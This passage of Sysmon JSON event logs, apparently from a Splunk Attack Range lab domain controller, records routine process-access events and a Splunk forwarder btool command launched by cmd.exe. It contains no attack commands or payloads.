ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-001062EB0300}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-001062EB0300}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.042\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nProcessId: 2764\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106F-5F25-0000-001062EB0300}\r\nParentProcessId: 3952\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.042","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106F-5F25-0000-001062EB0300}","ParentProcessId":"3952","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-106F-5F25-0000-001062EB0300}\r\nSourceProcessId: 3952\r\nSourceThreadId: 3948\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-106F-5F25-0000-001062EB0300}","SourceProcessId":"3952","SourceThreadId":"3948","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","TargetProcessId":"2764","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","TargetProcessId":"2764","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 